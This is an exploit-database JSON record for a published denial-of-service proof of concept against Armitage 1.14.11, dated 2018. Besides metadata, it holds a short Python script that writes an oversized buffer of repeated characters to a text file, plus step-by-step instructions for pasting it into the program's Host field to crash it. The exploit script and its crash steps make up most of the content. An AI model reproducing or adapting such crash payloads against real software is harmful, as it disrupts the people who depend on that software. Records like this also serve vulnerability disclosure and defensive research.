{"id": "PACKETSTORM:150919", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Armitage 1.14.11 Denial Of Service", "description": "", "published": "2018-12-26T00:00:00", "modified": "2018-12-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/150919/Armitage-1.14.11-Denial-Of-Service.html", "reporter": "Mr Winst0n", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-12-27T18:57:05", "viewCount": 11, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "_state": {"dependencies": 1678918916, "score": 1678917189, "epss": 1678939848}, "_internal": {"score_hash": "568495e7b715580f8ac5b63182e6324c"}, "sourceHref": "https://packetstormsecurity.com/files/download/150919/armitage-dos.py.txt", "sourceData": "`# Exploit Title: Armitage - Denial of Service (PoC) \n# Discovery by: Mr Winst0n \n# Discovery Date: 2018-12-26 \n# Vendor Homepage: http://www.fastandeasyhacking.com/ \n# Software Link : http://www.fastandeasyhacking.com/download/ \n# Tested Version: 1.14.11 \n# Tested on: Kali linux \n# Vulnerability Type: Denial of Service (DoS) \n \n \n# Steps to Produce the Crash: \n# 1.- Run python code : python armitage.py \n# 2.- Open Xarmitage.txt and copy content to clipboard \n# 3.- Open Armitage \n# 4.- In the small opend window, Paste ClipBoard on \"Host\" and click on \"Connect\" \n# 5.- Then you will see that the program can't process the data and will crash!(after the processing operation) \n \n \n \n#!/usr/bin/env python \n \nbuffer = \"\\x41\" * 384 \ncrash = buffer + \"BBBB\" + \"CCCC\" \nf = open(\"Xarmitage.txt\", \"w\") \nf.write(crash) \nf.close() \n \n`\n"}
{}